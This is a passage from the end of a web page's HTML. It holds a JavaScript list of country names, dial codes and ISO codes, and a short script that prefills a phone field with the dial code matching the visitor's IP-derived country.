"+52", "code": "MX" }, { "name": "Micronesia, Federated States of Micronesia", "dial_code": "+691", "code": "FM" }, { "name": "Moldova", "dial_code": "+373", "code": "MD" }, { "name": "Monaco", "dial_code": "+377", "code": "MC" }, { "name": "Mongolia", "dial_code": "+976", "code": "MN" }, { "name": "Montenegro", "dial_code": "+382", "code": "ME" }, { "name": "Montserrat", "dial_code": "+1664", "code": "MS" }, { "name": "Morocco", "dial_code": "+212", "code": "MA" }, { "name": "Mozambique", "dial_code": "+258", "code": "MZ" }, { "name": "Myanmar", "dial_code": "+95", "code": "MM" }, { "name": "Namibia", "dial_code": "+264", "code": "NA" }, { "name": "Nauru", "dial_code": "+674", "code": "NR" }, { "name": "Nepal", "dial_code": "+977", "code": "NP" }, { "name": "Netherlands", "dial_code": "+31", "code": "NL" }, { "name": "Netherlands Antilles", "dial_code": "+599", "code": "AN" }, { "name": "New Caledonia", "dial_code": "+687", "code": "NC" }, { "name": "New Zealand", "dial_code": "+64", "code": "NZ" }, { "name": "Nicaragua", "dial_code": "+505", "code": "NI" }, { "name": "Niger", "dial_code": "+227", "code": "NE" }, { "name": "Nigeria", "dial_code": "+234", "code": "NG" }, { "name": "Niue", "dial_code": "+683", "code": "NU" }, { "name": "Norfolk Island", "dial_code": "+672", "code": "NF" }, { "name": "Northern Mariana Islands", "dial_code": "+1670", "code": "MP" }, { "name": "Norway", "dial_code": "+47", "code": "NO" }, { "name": "Oman", "dial_code": "+968", "code": "OM" }, { "name": "Pakistan", "dial_code": "+92", "code": "PK" }, { "name": "Palau", "dial_code": "+680", "code": "PW" }, { "name": "Palestinian Territory, Occupied", "dial_code": "+970", "code": "PS" }, { "name": "Panama", "dial_code": "+507", "code": "PA" }, { "name": "Papua New Guinea", "dial_code": "+675", "code": "PG" }, { "name": "Paraguay", "dial_code": "+595", "code": "PY" }, { "name": "Peru", "dial_code": "+51", "code": "PE" }, { "name": "Philippines", "dial_code": "+63", "code": "PH" }, { "name": "Pitcairn", "dial_code": "+872", "code": "PN" }, { "name": "Poland", "dial_code": "+48", "code": "PL" }, { "name": "Portugal", "dial_code": "+351", "code": "PT" }, { "name": "Puerto Rico", "dial_code": "+1939", "code": "PR" }, { "name": "Qatar", "dial_code": "+974", "code": "QA" }, { "name": "Romania", "dial_code": "+40", "code": "RO" }, { "name": "Russia", "dial_code": "+7", "code": "RU" }, { "name": "Rwanda", "dial_code": "+250", "code": "RW" }, { "name": "Reunion", "dial_code": "+262", "code": "RE" }, { "name": "Saint Barthelemy", "dial_code": "+590", "code": "BL" }, { "name": "Saint Helena, Ascension and Tristan Da Cunha", "dial_code": "+290", "code": "SH" }, { "name": "Saint Kitts and Nevis", "dial_code": "+1869", "code": "KN" }, { "name": "Saint Lucia", "dial_code": "+1758", "code": "LC" }, { "name": "Saint Martin", "dial_code": "+590", "code": "MF" }, { "name": "Saint Pierre and Miquelon", "dial_code": "+508", "code": "PM" }, { "name": "Saint Vincent and the Grenadines", "dial_code": "+1784", "code": "VC" }, { "name": "Samoa", "dial_code": "+685", "code": "WS" }, { "name": "San Marino", "dial_code": "+378", "code": "SM" }, { "name": "Sao Tome and Principe", "dial_code": "+239", "code": "ST" }, { "name": "Saudi Arabia", "dial_code": "+966", "code": "SA" }, { "name": "Senegal", "dial_code": "+221", "code": "SN" }, { "name": "Serbia", "dial_code": "+381", "code": "RS" }, { "name": "Seychelles", "dial_code": "+248", "code": "SC" }, { "name": "Sierra Leone", "dial_code": "+232", "code": "SL" }, { "name": "Singapore", "dial_code": "+65", "code": "SG" }, { "name": "Slovakia", "dial_code": "+421", "code": "SK" }, { "name": "Slovenia", "dial_code": "+386", "code": "SI" }, { "name": "Solomon Islands", "dial_code": "+677", "code": "SB" }, { "name": "Somalia", "dial_code": "+252", "code": "SO" }, { "name": "South Africa", "dial_code": "+27", "code": "ZA" }, { "name": "South Sudan", "dial_code": "+211", "code": "SS" }, { "name": "South Georgia and the South Sandwich Islands", "dial_code": "+500", "code": "GS" }, { "name": "Spain", "dial_code": "+34", "code": "ES" }, { "name": "Sri Lanka", "dial_code": "+94", "code": "LK" }, { "name": "Sudan", "dial_code": "+249", "code": "SD" }, { "name": "Suriname", "dial_code": "+597", "code": "SR" }, { "name": "Svalbard and Jan Mayen", "dial_code": "+47", "code": "SJ" }, { "name": "Swaziland", "dial_code": "+268", "code": "SZ" }, { "name": "Sweden", "dial_code": "+46", "code": "SE" }, { "name": "Switzerland", "dial_code": "+41", "code": "CH" }, { "name": "Syrian Arab Republic", "dial_code": "+963", "code": "SY" }, { "name": "Taiwan", "dial_code": "+886", "code": "TW" }, { "name": "Tajikistan", "dial_code": "+992", "code": "TJ" }, { "name": "Tanzania, United Republic of Tanzania", "dial_code": "+255", "code": "TZ" }, { "name": "Thailand", "dial_code": "+66", "code": "TH" }, { "name": "Timor-Leste", "dial_code": "+670", "code": "TL" }, { "name": "Togo", "dial_code": "+228", "code": "TG" }, { "name": "Tokelau", "dial_code": "+690", "code": "TK" }, { "name": "Tonga", "dial_code": "+676", "code": "TO" }, { "name": "Trinidad and Tobago", "dial_code": "+1868", "code": "TT" }, { "name": "Tunisia", "dial_code": "+216", "code": "TN" }, { "name": "Turkey", "dial_code": "+90", "code": "TR" }, { "name": "Turkmenistan", "dial_code": "+993", "code": "TM" }, { "name": "Turks and Caicos Islands", "dial_code": "+1649", "code": "TC" }, { "name": "Tuvalu", "dial_code": "+688", "code": "TV" }, { "name": "Uganda", "dial_code": "+256", "code": "UG" }, { "name": "Ukraine", "dial_code": "+380", "code": "UA" }, { "name": "United Arab Emirates", "dial_code": "+971", "code": "AE" }, { "name": "United Kingdom", "dial_code": "+44", "code": "GB" }, { "name": "United States", "dial_code": "+1", "code": "US" }, { "name": "Uruguay", "dial_code": "+598", "code": "UY" }, { "name": "Uzbekistan", "dial_code": "+998", "code": "UZ" }, { "name": "Vanuatu", "dial_code": "+678", "code": "VU" }, { "name": "Venezuela, Bolivarian Republic of Venezuela", "dial_code": "+58", "code": "VE" }, { "name": "Vietnam", "dial_code": "+84", "code": "VN" }, { "name": "Virgin Islands, British", "dial_code": "+1284", "code": "VG" }, { "name": "Virgin Islands, U.S.", "dial_code": "+1340", "code": "VI" }, { "name": "Wallis and Futuna", "dial_code": "+681", "code": "WF" }, { "name": "Yemen", "dial_code": "+967", "code": "YE" }, { "name": "Zambia", "dial_code": "+260", "code": "ZM" }, { "name": "Zimbabwe", "dial_code": "+263", "code": "ZW" }];

            const { countryCode } = ip;

            for (let i = 0; i < cache.length; i++) {
                const { dial_code, code } = cache[i];

                if (code === countryCode) {
                    const element = document.querySelector('#phone');
                    element.value = dial_code;
                    return;
                }
            }
        });
    } catch (e) { console.log(e); }
</script>
</body>

</html>